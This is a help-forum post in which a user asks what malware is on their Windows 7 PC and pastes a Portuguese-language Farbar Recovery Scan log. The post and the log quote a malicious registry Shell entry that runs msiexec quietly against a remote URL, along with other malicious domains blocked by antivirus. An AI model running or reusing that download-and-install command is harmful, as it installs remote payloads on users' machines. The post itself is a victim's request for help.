What malware is this? How can I solve this FAST?



#1 IDFs0ldier


Posted 13 April 2017 - 09:58 AM

Since yesterday I have been trying to figure out what this virus on my PC is. I was watching YouTube videos when an Avast window popped up blocking a URL called http//point.rwmdqsj.com/Sc2_jt70411.msi.dat, and the process was C:\Windows\System32\msiexec.exe, exactly at 1:20 PM. Then, at 2:01 PM, another Avast pop-up blocked a URL called http//point.lotusiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF==, and this Avast block always happens exactly 3 hours after a detection. I ran the Farbar Recovery Scan Tool; the interesting part of the log is HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q, and here is my FRST log:

 

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 15-03-2017
Executado por Biel (administrador) em BIEL-PC (12-04-2017 18:32:35)
Executando a partir de C:\Users\Biel\Documents\EGDownloads
Perfis Carregados: Biel (Perfis Disponíveis: Biel)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 8 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
 
==================== Processos (Whitelisted) =================
 
(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(GAS Tecnologia) C:\Program Files (x86)\GbPlugin\GbpSv.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(GAS Tecnologia) C:\Program Files (x86)\GbPlugin\GbpSv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Registro (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8468184 2015-05-22] (Realtek Semiconductor)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [112512 2010-03-13] (Microsoft Corporation)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [Diebold - Warsaw] => C:\Program Files\Diebold\Warsaw\core.exe [925744 2016-06-23] (GAS Tecnologia LTDA)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-04-04] (AVAST Software)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-15] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-15] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
Winlogon\Notify\ GbPluginCef: C:\Program Files (x86)\GbPlugin\gbiehCef.dll [2016-08-10] (Caixa Economica Federal)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files\DAEMON Tools Lite\DTLite.exe [5583120 2015-02-27] (Disc Soft Ltd)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [Google Update] => C:\Users\Biel\AppData\Local\Google\Update\1.3.33.3\GoogleUpdateCore.exe [599632 2017-04-11] (Google Inc.)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-22] (Valve Corporation)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [eagleget_setup] => C:\Users\Biel\AppData\Local\Temp\is-KE1NB.tmp\eagleget_setup.tmp -V <===== ATENÇÃO
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [uTorrent] => C:\Users\Biel\AppData\Roaming\uTorrent\uTorrent.exe [2144448 2017-04-08] (BitTorrent Inc.)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: F - F:\Lenovo_Suite.exe
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {9836347d-9e45-11e6-bc16-08626698bb3b} - F:\Lenovo_Suite.exe
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {b740cf12-9ef6-11e6-a699-08626698bb3b} - F:\setup.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2016-10-30] (Microsoft Corporation)
IFEO\taskmgr.exe: [Debugger] 
ShellExecuteHooks-x32: GbPluginObj Class - {E37CB5F0-51F5-4395-A808-5FA49E399003} - C:\Program Files (x86)\GbPlugin\gbiehcef.dll [1903328 2016-08-10] (Caixa Economica Federal)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
GroupPolicy: Restrição <======= ATENÇÃO
 
==================== Internet (Whitelisted) ====================
 
(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{3C0BA5A4-FB7E-43F7-8993-B26A0F015ACA}: [DhcpNameServer] 172.20.24.1
Tcpip\..\Interfaces\{A397355B-4ACA-4437-B07E-F74451774240}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{C3A99120-ADBC-444D-A22C-B942A8B3C1F3}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-2097341823-3435128210-3467763070-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2016-05-23] (IObit)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-01-18] (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-04] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-01-18] (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-15] (Adobe Systems Incorporated)
BHO-x32: EGet Class -> {1E871FF8-029C-4732-8AA7-39E3D3872057} -> C:\Program Files (x86)\EagleGet\eagleSniffer.dll [2016-12-22] (EagleGet.com)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-04] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: GbIehObj Class -> {C41A1C0E-EA6C-11D4-B1B8-444553540003} -> C:\Program Files (x86)\GbPlugin\gbiehcef.dll [2016-08-10] (Caixa Economica Federal)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
 
FireFox:
========
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2017-01-08]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2017-01-08]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-11] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-01-18] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-01-18] (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-11] ()
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @raidcall.en/RCplugin -> C:\Users\Biel\AppData\Roaming\raidcall\plugins\nprcplugin.dll [2015-03-17] (Raidcall)
FF Plugin HKU\S-1-5-21-2097341823-3435128210-3467763070-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Biel\AppData\Local\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin HKU\S-1-5-21-2097341823-3435128210-3467763070-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Biel\AppData\Local\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin HKU\S-1-5-21-2097341823-3435128210-3467763070-1000: eagleget.com/EagleGet32 -> C:\Program Files (x86)\EagleGet\npEagleget.dll [2016-08-01] (EagleGet)
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://google.com.br/"
CHR Profile: C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default [2017-04-12]
CHR Extension: (Google Apresentações) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-29]
CHR Extension: (Google Docs) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-29]
CHR Extension: (Google Drive) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-29]
CHR Extension: (YouTube) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-29]
CHR Extension: (Planilhas do Google) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-29]
CHR Extension: (Documentos Google off-line) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-29]
CHR Extension: (AdBlock) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-04-12]
CHR Extension: (Avast Online Security) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-05]
CHR Extension: (EagleGet Free Downloader) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\kaebhgioafceeldhgjmendlfhbfjefmo [2017-03-24]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-08]
CHR Extension: (Gmail) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-29]
CHR Extension: (Chrome Media Router) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04]
CHR HKLM\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx [2017-01-06]
CHR HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx [2017-01-06]
CHR HKLM-x32\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx [2017-01-06]
StartMenuInternet: Google Chrome.BWR34HAGIGSXURE7TPOEEQTOZU - C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Serviços (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7398336 2017-04-04] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [261712 2017-04-04] (AVAST Software)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1272592 2015-02-27] (Disc Soft Ltd)
S2 egGetSvc; C:\Program Files (x86)\EagleGet\EGMonitor.exe [247464 2016-12-22] ()
R2 GbpSv; C:\Program Files (x86)\GbPlugin\GbpSv.exe [631520 2016-08-10] (GAS Tecnologia)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [317640 2015-03-30] (Intel Corporation)
S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2016-10-28] (IObit)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-02-23] (NVIDIA Corporation)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 Warsaw Technology; C:\Program Files\Diebold\Warsaw\core.exe [925744 2016-06-23] (GAS Tecnologia LTDA)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [307736 2017-04-04] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [189768 2017-04-04] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334088 2017-04-04] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [48528 2017-04-04] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-04-04] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-04-04] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [127112 2017-04-04] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-04-04] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-04-04] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1005048 2017-04-04] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [556784 2017-04-04] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [164064 2017-04-04] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-04-04] (AVAST Software)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30352 2016-10-29] (Disc Soft Ltd)
S3 eagleGet; C:\Windows\System32\Drivers\eagleGet.sys [79024 2016-10-11] (eagleGet) [Arquivo não assinado]
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-03-24] ()
R3 GBPRCM; C:\Program Files (x86)\GbPlugin\gbprcm64.sys [29912 2016-08-10] (GAS Tecnologia)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2014-04-24] (Intel Corporation)
R3 int0800; C:\Windows\System32\DRIVERS\flashud.sys [51712 2009-09-09] (Intel Corporation)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [186304 2017-04-12] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [111544 2017-04-12] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [43968 2017-04-12] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [251832 2017-04-12] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [82720 2017-04-12] (Malwarebytes)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-02-23] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [47672 2017-01-20] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [59448 2017-01-20] (NVIDIA Corporation)
R3 Warsaw_PP; C:\Program Files (x86)\GbPlugin\wsftprp64.sys [24792 2016-08-10] (GAS Tecnologia LTDA)
S3 wsddfac; C:\Windows\System32\drivers\wsddfac.sys [101080 2017-04-12] (GAS Tecnologia)
R1 wsddpp; C:\Windows\system32\drivers\wsddpp.sys [97376 2016-06-08] (GAS Tecnologia)
S1 gbpddfac; system32\drivers\gbpddfac64.sys [X]
S0 gbpddreg; system32\drivers\gbpddreg64.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
 
==================== Um Mês Criados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
2017-04-12 18:32 - 2017-04-12 18:32 - 00000000 ____D C:\FRST
2017-04-12 18:30 - 2017-04-12 18:30 - 00000000 ____D C:\Users\Todos os Usuários\SWCUTemp
2017-04-12 18:30 - 2017-04-12 18:30 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-04-12 13:44 - 2017-04-12 17:45 - 00082720 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00186304 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00111544 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-04-12 13:44 - 2017-04-12 13:44 - 00001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\Users\Todos os Usuários\Malwarebytes
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-12 13:44 - 2017-03-24 04:10 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-04-11 14:03 - 2017-04-11 14:03 - 00000000 ___HD C:\$AV_ASW
2017-04-11 13:20 - 2017-04-11 13:20 - 00000000 ____D C:\Users\Biel\AppData\Roaming\SSMgre
2017-04-10 08:11 - 2017-04-10 08:11 - 00003552 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
2017-04-07 18:03 - 2017-04-09 20:25 - 00000000 ____D C:\Users\Biel\AppData\Roaming\.minecraft
2017-04-04 18:42 - 2017-04-04 18:42 - 00399944 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-04-04 18:42 - 2017-04-04 18:42 - 00334088 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00307736 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00189768 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00048528 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00003914 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-03-25 18:50 - 2017-03-25 18:50 - 00000000 ____D C:\Users\Todos os Usuários\Caphyon
2017-03-25 18:50 - 2017-03-25 18:50 - 00000000 ____D C:\ProgramData\Caphyon
2017-03-25 18:34 - 2017-03-25 18:34 - 00000000 ____D C:\Users\Biel\AppData\Roaming\Warzone
2017-03-24 16:01 - 2017-03-24 16:01 - 00000082 _____ C:\Users\Biel\Documents\cc_20170324_160126.reg
2017-03-24 16:00 - 2017-03-24 16:00 - 00000082 _____ C:\Users\Biel\Documents\cc_20170324_160041.reg
2017-03-15 15:01 - 2017-03-15 20:17 - 00450803 _____ C:\Users\Biel\Documents\lol.pptx
2017-03-15 14:37 - 2017-03-15 14:37 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-03-15 14:37 - 2017-03-15 14:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
 
==================== Um Mês Modificados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
2017-04-12 18:32 - 2017-01-06 16:32 - 00000000 ____D C:\Users\Biel\Documents\EGDownloads
2017-04-12 14:26 - 2009-07-14 01:45 - 00016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-12 14:26 - 2009-07-14 01:45 - 00016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-12 14:25 - 2009-07-14 14:55 - 00705798 _____ C:\Windows\system32\prfh0416.dat
